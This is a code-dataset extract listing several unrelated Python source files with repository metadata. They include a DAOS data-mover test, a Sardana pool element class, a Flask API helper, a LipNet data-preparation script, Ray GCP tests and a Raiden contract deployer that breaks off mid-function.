hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
sequencelengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
sequencelengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
sequencelengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
794614ab79d39b1eb5b619569e5e1b28d03c5c7b | 7,774 | py | Python | src/tests/ftest/datamover/posix_meta_entry.py | fedepad/daos | ac71a320b8426b1eeb1457b0b6f5e6e115dfc9aa | [
"BSD-2-Clause-Patent"
] | 429 | 2016-09-28T20:43:20.000Z | 2022-03-25T01:22:50.000Z | src/tests/ftest/datamover/posix_meta_entry.py | fedepad/daos | ac71a320b8426b1eeb1457b0b6f5e6e115dfc9aa | [
"BSD-2-Clause-Patent"
] | 6,341 | 2016-11-24T12:34:26.000Z | 2022-03-31T23:53:46.000Z | src/tests/ftest/datamover/posix_meta_entry.py | fedepad/daos | ac71a320b8426b1eeb1457b0b6f5e6e115dfc9aa | [
"BSD-2-Clause-Patent"
] | 202 | 2016-10-30T14:47:53.000Z | 2022-03-30T21:29:11.000Z | #!/usr/bin/python
'''
(C) Copyright 2020-2021 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
'''
from data_mover_test_base import DataMoverTestBase
from os.path import join
class DmvrPosixMetaEntry(DataMoverTestBase):
# pylint: disable=too-many-ancestors
"""Test class for POSIX DataMover entry metadata validation.
Test Class Description:
Tests metadata preservation on POSIX entries.
I.e. files, directories, symlinks.
:avocado: recursive
"""
def test_dm_posix_meta_entry_dcp(self):
"""JIRA id: DAOS-6390
Test Description:
Verifies that POSIX metadata is preserved for dcp.
:avocado: tags=all,full_regression
:avocado: tags=datamover,dcp,dfuse
:avocado: tags=dm_posix_meta_entry,dm_posix_meta_entry_dcp
"""
self.run_dm_posix_meta_entry("DCP")
def run_dm_posix_meta_entry(self, tool):
"""
Use Cases:
Create pool1.
Create cont1 and cont2 in pool1.
Create a source directory in cont1 that contains:
1 directory, 1 file, 1 symlink.
xattrs on the directory and file.
Create a similar source directory in an external POSIX file system.
Copy the DAOS source to another DAOS directory.
Copy the DAOS source to an external POSIX file system.
Copy the POSIX source to another DAOS directory.
For each case, verify that permissions and owners are preserved.
Repeat each case, but with the --preserve flag.
For each case, verify that xattrs and timestamps are preserved.
Args:
tool (str): The DataMover tool to run the test with.
Must be a valid tool in self.TOOLS.
"""
# Set the tool to use
self.set_tool(tool)
# Get preserve level
preserve_on = self.params.get(
"preserve", "/run/{}/*".format(self.tool.lower()))
test_desc = self.test_id + " (preserve={})".format(str(preserve_on))
# Start dfuse to hold all pools/containers
self.start_dfuse(self.dfuse_hosts)
# Create 1 pool
pool1 = self.create_pool()
# Create 1 source container with test data
cont1 = self.create_cont(pool1)
daos_src_path = self.new_daos_test_path(False)
dfuse_src_path = "{}/{}/{}{}".format(
self.dfuse.mount_dir.value, pool1.uuid, cont1.uuid, daos_src_path)
self.create_data(dfuse_src_path)
# Create 1 source posix path with test data
posix_src_path = self.new_posix_test_path(parent=self.workdir)
self.create_data(posix_src_path)
# Run each variation with and without the --preserve option
# For each case, create a new destination directory.
# For DAOS, cont1 is used as the source and destination.
# DAOS -> DAOS
daos_dst_path = self.new_daos_test_path(False)
dfuse_dst_path = "{}/{}/{}{}".format(
self.dfuse.mount_dir.value, pool1.uuid, cont1.uuid, daos_dst_path)
self.run_datamover(
test_desc + "(DAOS->DAOS)",
"DAOS", daos_src_path, pool1, cont1,
"DAOS", daos_dst_path, pool1, cont1)
self.compare_data(
dfuse_src_path, dfuse_dst_path,
cmp_times=preserve_on, cmp_xattr=preserve_on)
# DAOS -> POSIX
posix_dst_path = self.new_posix_test_path(create=False, parent=self.workdir)
self.run_datamover(
test_desc + "(DAOS->POSIX)",
"DAOS", daos_src_path, pool1, cont1,
"POSIX", posix_dst_path)
self.compare_data(
dfuse_src_path, posix_dst_path,
cmp_times=preserve_on, cmp_xattr=preserve_on)
# POSIX -> DAOS
daos_dst_path = self.new_daos_test_path(False)
dfuse_dst_path = "{}/{}/{}{}".format(
self.dfuse.mount_dir.value, pool1.uuid, cont1.uuid, daos_dst_path)
self.run_datamover(
test_desc + "(POSIX->DAOS)",
"POSIX", posix_src_path, None, None,
"DAOS", daos_dst_path, pool1, cont1)
self.compare_data(
posix_src_path, dfuse_dst_path,
cmp_times=preserve_on, cmp_xattr=preserve_on)
def create_data(self, path):
"""Create the test data.
Args:
path (str): Where to create the data.
"""
cmd_list = [
# One directory
"mkdir -p '{}'".format(join(path, "dir1")),
"pushd '{}'".format(path),
# xattrs for the directory
"setfattr -n 'user.dir1_attr1' -v 'dir1_value1' 'dir1'",
"setfattr -n 'user.dir1_attr2' -v 'dir1_value2' 'dir1'",
# One file in the directory
"echo 'test_data' > 'dir1/file1'",
# xattrs for the file
"setfattr -n 'user.file1_attr1' -v 'file1_value1' 'dir1/file1'",
"setfattr -n 'user.file1_attr2' -v 'file1_value2' 'dir1/file1'",
# One symlink in the directory
"ln -s 'file1' 'dir1/link1'",
"popd"
]
self.execute_cmd_list(cmd_list)
def compare_data(self, path1, path2, cmp_filetype=True,
cmp_perms=True, cmp_owner=True, cmp_times=False,
cmp_xattr=False):
"""Compare the test data.
Args:
path1 (str): The left-hand side to compare.
path2 (str): The right-hand side to compare.
cmp_filetype (bool, optional): Whether to compare the filetype.
Default is True.
cmp_perms (bool, optional): Whether to compare the permissions.
Default is True.
cmp_owner (bool, optional): Whether to compare the user and group
ownership. Default is True.
cmp_times (bool, optional): Whether to compare mtime.
Default is False.
cmp_xattr (bool, optional): Whether to compare xattrs.
Default is False.
"""
self.log.info("compare_data('%s', '%s')", path1, path2)
# Generate the fields to compare
field_printf = ""
if cmp_filetype:
field_printf += "File Type: %F\\n"
if cmp_perms:
field_printf += "Permissions: %A\\n"
if cmp_owner:
field_printf += "Group Name: %G\\n"
field_printf += "User Name: %U\\n"
if cmp_times:
field_printf += "mtime: %Y\\n"
# Diff the fields for each entry
for entry in ["dir1", "dir1/file1", "dir1/link1"]:
entry1 = join(path1, entry)
entry2 = join(path2, entry)
if field_printf:
# Use stat to get perms, etc.
stat_cmd1 = "stat --printf '{}' '{}'".format(
field_printf, entry1)
stat_cmd2 = "stat --printf '{}' '{}'".format(
field_printf, entry2)
diff_cmd = "diff <({} 2>&1) <({} 2>&1)".format(
stat_cmd1, stat_cmd2)
self.execute_cmd(diff_cmd)
if cmp_xattr:
# Use getfattr to get the xattrs
xattr_cmd1 = "getfattr -d -h '{}'".format(entry1)
xattr_cmd2 = "getfattr -d -h '{}'".format(entry2)
diff_cmd = "diff -I '^#' <({} 2>&1) <({} 2>&1)".format(
xattr_cmd1, xattr_cmd2)
self.execute_cmd(diff_cmd)
def execute_cmd_list(self, cmd_list):
"""Execute a list of commands, separated by &&.
Args:
cmd_list (list): A list of commands to execute.
"""
cmd = " &&\n".join(cmd_list)
self.execute_cmd(cmd)
| 37.921951 | 84 | 0.574479 |
794615a1ea1925c7f64e9425ece5961482fc6bce | 13,173 | py | Python | src/sardana/pool/poolbaseelement.py | tacaswell/sardana | be8d64d34234b35a37b4cd8233e86fcda13f64b8 | [
"CC-BY-3.0"
] | null | null | null | src/sardana/pool/poolbaseelement.py | tacaswell/sardana | be8d64d34234b35a37b4cd8233e86fcda13f64b8 | [
"CC-BY-3.0"
] | null | null | null | src/sardana/pool/poolbaseelement.py | tacaswell/sardana | be8d64d34234b35a37b4cd8233e86fcda13f64b8 | [
"CC-BY-3.0"
] | null | null | null | #!/usr/bin/env python
##############################################################################
##
# This file is part of Sardana
##
# http://www.sardana-controls.org/
##
# Copyright 2011 CELLS / ALBA Synchrotron, Bellaterra, Spain
##
# Sardana is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
##
# Sardana is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
##
# You should have received a copy of the GNU Lesser General Public License
# along with Sardana. If not, see <http://www.gnu.org/licenses/>.
##
##############################################################################
"""This module is part of the Python Pool library. It defines the base classes
for"""
__all__ = ["PoolBaseElement"]
__docformat__ = 'restructuredtext'
import weakref
import threading
from taurus.core.util.lock import TaurusLock
from sardana import State
from sardana.sardanaevent import EventType
from sardana.pool.poolobject import PoolObject
class PoolBaseElement(PoolObject):
"""A Pool object that besides the name, reference to the pool, ID, full_name
and user_full_name has:
- _simulation_mode : boolean telling if in simulation mode
- _state : element state
- _status : element status"""
def __init__(self, **kwargs):
self._simulation_mode = False
self._state = None
self._state_event = None
self._status = None
self._status_event = None
self._action_cache = None
self._aborted = False
self._stopped = False
lock_name = kwargs['name'] + "Lock"
# A lock for high level operations: monitoring, motion or acquisition
self._lock = TaurusLock(name=lock_name, lock=threading.RLock())
# The operation context in which the element is involved
self._operation = None
# The :class:`PoolAction` in which element is involved
self._pool_action = None
super(PoolBaseElement, self).__init__(**kwargs)
def __enter__(self):
self.lock()
def __exit__(self, exc_type, exc_value, traceback):
self.unlock()
return False
def lock(self, blocking=True):
"""Acquires the this element lock
:param blocking:
whether or not to block if lock is already acquired [default: True]
:type blocking: bool"""
ret = self._lock.acquire(blocking)
return ret
def unlock(self):
ret = self._lock.release()
return ret
def get_action_cache(self):
"""Returns the internal action cache object"""
return self._action_cache
def serialize(self, *args, **kwargs):
ret = PoolObject.serialize(self, *args, **kwargs)
return ret
# --------------------------------------------------------------------------
# simulation mode
# --------------------------------------------------------------------------
def get_simulation_mode(self, cache=True, propagate=1):
"""Returns the simulation mode for this object.
:param cache: not used [default: True]
:type cache: bool
:param propagate: [default: 1]
:type propagate: int
:return: the current simulation mode
:rtype: bool"""
return self._simulation_mode
def set_simulation_mode(self, simulation_mode, propagate=1):
self._simulation_mode = simulation_mode
if not propagate:
return
if simulation_mode == self._simulation_mode:
# current state is equal to last state_event. Skip event
return
self.fire_event(EventType("simulation_mode", priority=propagate),
simulation_mode)
def put_simulation_mode(self, simulation_mode):
self._simulation_mode = simulation_mode
simulation_mode = property(get_simulation_mode, set_simulation_mode,
doc="element simulation mode")
# --------------------------------------------------------------------------
# state
# --------------------------------------------------------------------------
def get_state(self, cache=True, propagate=1):
"""Returns the state for this object. If cache is True (default) it
returns the current state stored in cache (it will force an update if
cache is empty). If propagate > 0 and if the state changed since last
read, it will propagate the state event to all listeners.
:param cache:
tells if return value from local cache or update from HW read
[default: True]
:type cache: bool
:param propagate:
if > 0 propagates the event in case it changed since last HW read.
Values bigger that mean the event if sent should be a priority event
[default: 1]
:type propagate: int
:return: the current object state
:rtype: :obj:`sardana.State`"""
if not cache or self._state is None:
state_info = self.read_state_info()
self._set_state_info(state_info, propagate=propagate)
return self._state
def inspect_state(self):
"""Looks at the current cached value of state
:return: the current object state
:rtype: :obj:`sardana.State`"""
return self._state
def set_state(self, state, propagate=1):
self._set_state(state, propagate=propagate)
def _set_state(self, state, propagate=1):
self._state = state
if not propagate:
return
if state == self._state_event:
# current state is equal to last state_event. Skip event
return
self._state_event = state
self.fire_event(EventType("state", priority=propagate), state)
def put_state(self, state):
self._state = state
state = property(get_state, set_state, doc="element state")
# --------------------------------------------------------------------------
# status
# --------------------------------------------------------------------------
def inspect_status(self):
"""Looks at the current cached value of status
:return: the current object status
:rtype: :obj:`str`
"""
return self._status
def get_status(self, cache=True, propagate=1):
"""Returns the status for this object. If cache is True (default) it
returns the current status stored in cache (it will force an update if
cache is empty). If propagate > 0 and if the status changed since last
read, it will propagate the status event to all listeners.
:param cache:
tells if return value from local cache or update from HW read
[default: True]
:type cache: bool
:param propagate:
if > 0 propagates the event in case it changed since last HW read.
Values bigger that mean the event if sent should be a priority event
[default: 1]
:type propagate: int
:return: the current object status
:rtype: :obj:`str`
"""
if not cache or self._status is None:
state_info = self.read_state_info()
self._set_state_info(state_info, propagate=propagate)
return self._status
def set_status(self, status, propagate=1):
self._set_status(status, propagate=propagate)
def _set_status(self, status, propagate=1):
self._status = status
if not propagate:
return
s_evt = self._status_event
if s_evt is not None and len(status) == len(s_evt) and status == s_evt:
# current status is equal to last status_event. Skip event
return
self._status_event = status
self.fire_event(EventType("status", priority=propagate), status)
def put_status(self, status):
self._status = status
status = property(get_status, set_status, doc="element status")
# --------------------------------------------------------------------------
# state information
# --------------------------------------------------------------------------
_STD_STATUS = "{name} is {state}\n{ctrl_status}"
def calculate_state_info(self, status_info=None):
"""Transforms the given state information. This specific base
implementation transforms the given state,status tuple into a
state, new_status tuple where new_status is "*self.name* is *state*
plus the given status.
It is assumed that the given status comes directly from the controller
status information.
:param status_info:
given status information [default: None, meaning use current state status.
:type status_info: tuple<State, str>
:return: a transformed state information
:rtype: tuple<State, str>"""
if status_info is None:
status_info = self._state, self._status
state, status = status_info
state_str = State[state]
new_status = self._STD_STATUS.format(name=self.name, state=state_str,
ctrl_status=status)
return status_info[0], new_status
def set_state_info(self, state_info, propagate=1):
self._set_state_info(state_info, propagate=propagate)
def _set_state_info(self, state_info, propagate=1):
state_info = self.calculate_state_info(state_info)
state, status = state_info[:2]
self._set_status(status, propagate=propagate)
self._set_state(state, propagate=propagate)
def read_state_info(self):
action_cache = self.get_action_cache()
ctrl_state_info = action_cache.read_state_info(serial=True)[self]
return self._from_ctrl_state_info(ctrl_state_info)
def put_state_info(self, state_info):
self.set_state_info(state_info, propagate=0)
def _from_ctrl_state_info(self, state_info):
try:
state_str = State.whatis(state_info)
return int(state_info), "{0} is in {1}".format(self.name, state_str)
except KeyError:
pass
state_info, _ = state_info
state, status = state_info[:2]
state = int(state)
return state, status
# --------------------------------------------------------------------------
# default attribute
# --------------------------------------------------------------------------
def get_default_attribute(self):
return NotImplementedError("%s doesn't have default attribute" % self.__class__.__name__)
# --------------------------------------------------------------------------
# default acquisition channel name
# --------------------------------------------------------------------------
def get_default_acquisition_channel(self):
return self.get_default_attribute().name
# --------------------------------------------------------------------------
# stop
# --------------------------------------------------------------------------
def stop(self):
self._stopped = True
def was_stopped(self):
return self._stopped
# --------------------------------------------------------------------------
# abort
# --------------------------------------------------------------------------
def abort(self):
self._aborted = True
def was_aborted(self):
return self._aborted
# --------------------------------------------------------------------------
# interrupted
# --------------------------------------------------------------------------
def was_interrupted(self):
"""Tells if action ended by an abort or stop"""
return self.was_aborted() or self.was_stopped()
# --------------------------------------------------------------------------
# involved in an operation
# --------------------------------------------------------------------------
def is_action_running(self):
"""Determines if the element action is running or not."""
return self.get_action_cache().is_running()
def is_in_operation(self):
"""Returns True if this element is involved in any operation"""
return self.get_operation() is not None
def is_in_local_operation(self):
return self.get_operation() == self.get_action_cache()
def get_operation(self):
return self._operation
def set_operation(self, operation):
if self.is_in_operation() and operation is not None:
raise Exception("%s is already involved in an operation"
% self.name)
if operation is not None:
self._aborted = False
self._stopped = False
self._operation = operation
def clear_operation(self):
return self.set_operation(None)
| 36.18956 | 97 | 0.562211 |
794615d14fcb23899eb3c4e7a590ab75d10dc1d8 | 2,155 | py | Python | flaskr/handyfunctions.py | tuilagio/wordNotify-rev1 | 4db3216182ac2a0b273906805a3c8005326d6e25 | [
"BSD-3-Clause"
] | null | null | null | flaskr/handyfunctions.py | tuilagio/wordNotify-rev1 | 4db3216182ac2a0b273906805a3c8005326d6e25 | [
"BSD-3-Clause"
] | 2 | 2021-03-10T15:48:08.000Z | 2021-10-06T16:00:56.000Z | flaskr/handyfunctions.py | tuilagio/wordNotify-rev1 | 4db3216182ac2a0b273906805a3c8005326d6e25 | [
"BSD-3-Clause"
] | null | null | null | import base64, json
import requests
from werkzeug.security import generate_password_hash
url_base = 'http://127.0.0.1:5000'
get_dicts = '/api/v1/dicts' # lang=${lang}&random=true
# user="tom"
# password="thisIStom"
# encoded_u = base64.b64encode((user+":"+password).encode()).decode()
# headers = {'Content-Type': 'application/json',
# "Authorization": "Basic %s" % encoded_u}
# response = requests.get('http://127.0.0.1:5000/api/v1/resources/dicts?lang=DE_EN&random=true', auth=HTTPBasicAuth('tom', 'thisIStom')).content.decode('utf-8')
# json.loads(
def get_dict_by_param(encoded_u, dict_id="", url_only=False):
if dict_id != "":
dict_id = "/"+dict_id
url_full = f"{url_base}{get_dicts}{dict_id}"
print(url_full)
headers = {'Content-Type': 'application/json',
"Authorization": "Basic %s" % encoded_u}
response = requests.get(url_full, headers=headers)
if url_only:
return url_full
if response.status_code == 200:
return json.loads(response.content.decode('utf-8')), url_full
else:
return None
def get_word_by_param(encoded_u, dict_id="", word_id="", url_only=False):
# callsign = "&random=true" if id=="" else f"&id={id}"
if word_id != "":
word_id = "/"+word_id
url_full = f"{url_base}{get_dicts}/{dict_id}/words{word_id}"
print(url_full)
headers = {'Content-Type': 'application/json',
"Authorization": "Basic %s" % encoded_u}
response = requests.get(url_full, headers=headers)
if url_only:
return url_full
if response.status_code == 200:
return json.loads(response.content.decode('utf-8')), url_full
else:
return None
def update_config(app, new_config):
app.config["GLOBAL_CONFIG"] = new_config
user = new_config["settings"]["API_username"]
password = new_config["settings"]["API_password"]
users = {
user: generate_password_hash(password),
"jerry": generate_password_hash("ThatisJerry")
}
encoded_u = base64.b64encode((user+":"+password).encode()).decode()
app.config.from_mapping(
USERS=users,
ENCODED_U=encoded_u,
) | 36.525424 | 160 | 0.655684 |
794616108a8c564f6d383d75332328a9d50565ef | 2,457 | py | Python | training/overlapped_speakers/prepare.py | dimaxano/LipNet | 5990b0a0a5331ccbc2c110dfcbbf1b08e1704d19 | [
"MIT"
] | 560 | 2017-04-20T06:22:10.000Z | 2022-03-31T06:47:15.000Z | training/overlapped_speakers/prepare.py | dimaxano/LipNet | 5990b0a0a5331ccbc2c110dfcbbf1b08e1704d19 | [
"MIT"
] | 123 | 2017-04-25T11:41:45.000Z | 2022-03-11T23:11:38.000Z | training/overlapped_speakers/prepare.py | dimaxano/LipNet | 5990b0a0a5331ccbc2c110dfcbbf1b08e1704d19 | [
"MIT"
] | 241 | 2017-05-03T14:27:05.000Z | 2022-03-06T08:38:44.000Z | import os
import glob
import subprocess
import sys
'''
This script prepare training folder and its dataset for each speaker.
- Folder s{i}/datasets/train would contain original DATASET_VIDEO - s{i} with 0 <= i < VAL_SAMPLES
- Folder s{i}/datasets/val would contain s{i} >= VAL_SAMPLES
- Folder s{i}/datasets/align would contain all your *.align
Usage:
$ python prepare.py [Path to video dataset] [Path to align dataset] [Number of samples]
Notes:
- [Path to video dataset] should be a folder with structure: /s{i}/[video]
- [Path to align dataset] should be a folder with structure: /[align].align
- [Number of samples] should be less than or equal to min(len(ls '/s{i}/*'))
'''
CURRENT_PATH = os.path.dirname(os.path.abspath(__file__))
DATASET_VIDEO_PATH = sys.argv[1]
DATASET_ALIGN_PATH = sys.argv[2]
VAL_SAMPLES = int(sys.argv[3])
for speaker_path in glob.glob(os.path.join(DATASET_VIDEO_PATH, '*')):
speaker_id = os.path.splitext(speaker_path)[0].split('/')[-1]
subprocess.check_output("mkdir -p '{}'".format(os.path.join(CURRENT_PATH, speaker_id, 'datasets', 'train')), shell=True)
for s_path in glob.glob(os.path.join(DATASET_VIDEO_PATH, '*')):
s_id = os.path.splitext(s_path)[0].split('/')[-1]
if s_path == speaker_path:
subprocess.check_output("mkdir -p '{}'".format(os.path.join(CURRENT_PATH, speaker_id, 'datasets', 'train', s_id)), shell=True)
subprocess.check_output("mkdir -p '{}'".format(os.path.join(CURRENT_PATH, speaker_id, 'datasets', 'val', s_id)), shell=True)
n = 0
for video_path in glob.glob(os.path.join(DATASET_VIDEO_PATH, speaker_id, '*')):
video_id = os.path.splitext(video_path)[0].split('/')[-1]
if n < VAL_SAMPLES:
subprocess.check_output("ln -s '{}' '{}'".format(video_path, os.path.join(CURRENT_PATH, speaker_id, 'datasets', 'val', s_id, video_id)), shell=True)
else:
subprocess.check_output("ln -s '{}' '{}'".format(video_path, os.path.join(CURRENT_PATH, speaker_id, 'datasets', 'train', s_id, video_id)), shell=True)
n += 1
else:
subprocess.check_output("ln -s '{}' '{}'".format(s_path, os.path.join(CURRENT_PATH, speaker_id, 'datasets', 'train', s_id)), shell=True)
subprocess.check_output("ln -s '{}' '{}'".format(DATASET_ALIGN_PATH, os.path.join(CURRENT_PATH, speaker_id, 'datasets', 'align')), shell=True) | 50.142857 | 170 | 0.658527 |
794616780fd7f37b20ade8b14629b56ac5c88531 | 411 | py | Python | queryengine/cli.py | AndyQW/queryengine | 417cb374edfcaf395e8a392bffb01fa66c82a3a9 | [
"MIT"
] | null | null | null | queryengine/cli.py | AndyQW/queryengine | 417cb374edfcaf395e8a392bffb01fa66c82a3a9 | [
"MIT"
] | null | null | null | queryengine/cli.py | AndyQW/queryengine | 417cb374edfcaf395e8a392bffb01fa66c82a3a9 | [
"MIT"
] | null | null | null | """Console script for queryengine."""
import sys
import click
@click.command()
def main(args=None):
"""Console script for queryengine."""
click.echo("Replace this message by putting your code into "
"queryengine.cli.main")
click.echo("See click documentation at https://click.palletsprojects.com/")
return 0
if __name__ == "__main__":
sys.exit(main()) # pragma: no cover
| 24.176471 | 79 | 0.671533 |
794617097fc33837304ba2e565c72a92dc686991 | 1,634 | py | Python | python/ray/tests/gcp/test_gcp_node_provider.py | 77loopin/ray | 9322f6aab53f4ca5baf5a3573e1ffde12feae519 | [
"Apache-2.0"
] | 21,382 | 2016-09-26T23:12:52.000Z | 2022-03-31T21:47:45.000Z | python/ray/tests/gcp/test_gcp_node_provider.py | 77loopin/ray | 9322f6aab53f4ca5baf5a3573e1ffde12feae519 | [
"Apache-2.0"
] | 19,689 | 2016-09-17T08:21:25.000Z | 2022-03-31T23:59:30.000Z | python/ray/tests/gcp/test_gcp_node_provider.py | gramhagen/ray | c18caa4db36d466718bdbcb2229aa0b2dc03da1f | [
"Apache-2.0"
] | 4,114 | 2016-09-23T18:54:01.000Z | 2022-03-31T15:07:32.000Z | import pytest
from ray.autoscaler._private.gcp.node import GCPCompute
_PROJECT_NAME = "project-one"
_AZ = "us-west1-b"
@pytest.mark.parametrize(
"test_case", [("n1-standard-4", f"zones/{_AZ}/machineTypes/n1-standard-4"),
(f"zones/{_AZ}/machineTypes/n1-standard-4",
f"zones/{_AZ}/machineTypes/n1-standard-4")])
def test_convert_resources_to_urls_machine(test_case):
gcp_compute = GCPCompute(None, _PROJECT_NAME, _AZ, "cluster_name")
base_machine, result_machine = test_case
modified_config = gcp_compute._convert_resources_to_urls({
"machineType": base_machine
})
assert modified_config["machineType"] == result_machine
@pytest.mark.parametrize("test_case", [
("nvidia-tesla-k80",
f"projects/{_PROJECT_NAME}/zones/{_AZ}/acceleratorTypes/nvidia-tesla-k80"
),
(f"projects/{_PROJECT_NAME}/zones/{_AZ}/acceleratorTypes/nvidia-tesla-k80",
f"projects/{_PROJECT_NAME}/zones/{_AZ}/acceleratorTypes/nvidia-tesla-k80"
),
])
def test_convert_resources_to_urls_accelerators(test_case):
gcp_compute = GCPCompute(None, _PROJECT_NAME, _AZ, "cluster_name")
base_accel, result_accel = test_case
base_config = {
"machineType": "n1-standard-4",
"guestAccelerators": [{
"acceleratorCount": 1,
"acceleratorType": base_accel
}]
}
modified_config = gcp_compute._convert_resources_to_urls(base_config)
assert modified_config["guestAccelerators"][0][
"acceleratorType"] == result_accel
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", __file__]))
| 32.039216 | 79 | 0.689718 |
794617bd9eed5499fd71921428be24b53c971d83 | 15,635 | py | Python | raiden_contracts/deploy/contract_deployer.py | LefterisJP/raiden-contracts | fdcee22d22aeacb16efb58c3a324ac20c01cdb40 | [
"MIT"
] | 1 | 2021-04-23T03:59:00.000Z | 2021-04-23T03:59:00.000Z | raiden_contracts/deploy/contract_deployer.py | LefterisJP/raiden-contracts | fdcee22d22aeacb16efb58c3a324ac20c01cdb40 | [
"MIT"
] | null | null | null | raiden_contracts/deploy/contract_deployer.py | LefterisJP/raiden-contracts | fdcee22d22aeacb16efb58c3a324ac20c01cdb40 | [
"MIT"
] | null | null | null | from copy import deepcopy
from logging import getLogger
from pathlib import Path
from typing import Any, Dict, List, Optional
from eth_typing import HexAddress
from eth_utils import encode_hex, is_address, to_checksum_address
from eth_utils.units import units
from web3 import Web3
from web3.contract import Contract, ContractFunction
from web3.middleware import construct_sign_and_send_raw_middleware
from raiden_contracts.constants import (
CONTRACT_MONITORING_SERVICE,
CONTRACT_ONE_TO_N,
CONTRACT_SECRET_REGISTRY,
CONTRACT_SERVICE_REGISTRY,
CONTRACT_TOKEN_NETWORK_REGISTRY,
CONTRACT_USER_DEPOSIT,
CONTRACTS_VERSION,
)
from raiden_contracts.contract_manager import CompiledContract, DeployedContract, DeployedContracts
from raiden_contracts.contract_source_manager import ContractSourceManager, contracts_source_path
from raiden_contracts.deploy.contract_verifier import ContractVerifier
from raiden_contracts.utils.file_ops import load_json_from_path
from raiden_contracts.utils.signature import private_key_to_address
from raiden_contracts.utils.transaction import check_successful_tx
from raiden_contracts.utils.versions import (
contracts_version_expects_deposit_limits,
contracts_version_has_initial_service_deposit,
)
LOG = getLogger(__name__)
class ContractDeployer(ContractVerifier):
def __init__(
self,
web3: Web3,
private_key: str,
gas_limit: int,
gas_price: int,
wait: int = 10,
contracts_version: Optional[str] = None,
):
# pylint: disable=E1101
super(ContractDeployer, self).__init__(web3=web3, contracts_version=contracts_version)
self.wait = wait
self.owner = private_key_to_address(private_key)
self.transaction = {"from": self.owner, "gas": gas_limit}
self.transaction["gasPrice"] = gas_price * int(units["gwei"])
self.web3.middleware_stack.add(construct_sign_and_send_raw_middleware(private_key))
# Check that the precompiled data matches the source code
# Only for current version, because this is the only one with source code
if self.contracts_version in [None, CONTRACTS_VERSION]:
contract_manager_source = ContractSourceManager(contracts_source_path())
contract_manager_source.verify_precompiled_checksums(self.precompiled_path)
else:
LOG.info("Skipped checks against the source code because it is not available.")
def deploy(self, contract_name: str, args: Optional[List] = None) -> Dict:
if args is None:
args = list()
contract_interface: CompiledContract = self.contract_manager.get_contract(contract_name)
# Instantiate and deploy contract
contract = self.web3.eth.contract(
abi=contract_interface["abi"], bytecode=contract_interface["bin"]
)
# Get transaction hash from deployed contract
txhash = self.send_deployment_transaction(contract=contract, args=args)
# Get tx receipt to get contract address
LOG.debug(
f"Deploying {contract_name} txHash={encode_hex(txhash)}, "
f"contracts version {self.contract_manager.contracts_version}"
)
(receipt, tx) = check_successful_tx(web3=self.web3, txid=txhash, timeout=self.wait)
if not receipt["contractAddress"]: # happens with Parity
receipt = dict(receipt)
receipt["contractAddress"] = tx["creates"]
LOG.info(
"{0} address: {1}. Gas used: {2}".format(
contract_name, receipt["contractAddress"], receipt["gasUsed"]
)
)
return receipt
def transact(self, contract_method: ContractFunction) -> Dict:
""" A wrapper around to_be_called.transact() that waits until the transaction succeeds. """
txhash = contract_method.transact(self.transaction)
LOG.debug(f"Sending txHash={encode_hex(txhash)}")
(receipt, _) = check_successful_tx(web3=self.web3, txid=txhash, timeout=self.wait)
return receipt
def send_deployment_transaction(self, contract: Contract, args: List) -> str:
txhash = None
while txhash is None:
try:
txhash = contract.constructor(*args).transact(self.transaction)
except ValueError as ex:
# pylint: disable=E1126
if ex.args[0]["code"] == -32015:
LOG.info(f"Deployment failed with {ex}. Retrying...")
else:
raise ex
return txhash
def deploy_token_contract(
self,
token_supply: int,
token_decimals: int,
token_name: str,
token_symbol: str,
token_type: str = "CustomToken",
) -> Dict[str, HexAddress]:
"""Deploy a token contract."""
receipt = self.deploy(
contract_name=token_type, args=[token_supply, token_decimals, token_name, token_symbol]
)
token_address = receipt["contractAddress"]
assert token_address and is_address(token_address)
token_address = to_checksum_address(token_address)
return {token_type: token_address}
def deploy_raiden_contracts(
self,
max_num_of_token_networks: Optional[int],
reuse_secret_registry_from_deploy_file: Optional[Path],
settle_timeout_min: int,
settle_timeout_max: int,
) -> DeployedContracts:
""" Deploy all required raiden contracts and return a dict of contract_name:address
Args:
max_num_of_token_networks (Optional[int]): The max number of tokens that can be
registered to the TokenNetworkRegistry. If None, the argument is omitted from
the call to the constructor of TokenNetworkRegistry.
"""
deployed_contracts: DeployedContracts = {
"contracts_version": self.contract_manager.contracts_version,
"chain_id": int(self.web3.version.network),
"contracts": {},
}
if reuse_secret_registry_from_deploy_file:
reused_doc = DeployedContracts( # type: ignore
load_json_from_path(reuse_secret_registry_from_deploy_file)
)
if not reused_doc:
raise RuntimeError(
f"{reuse_secret_registry_from_deploy_file} does not contain deployment data."
)
reused_contracts = reused_doc["contracts"]
secret_registry = self.contract_instance_from_deployment_data(
reused_doc, CONTRACT_SECRET_REGISTRY
)
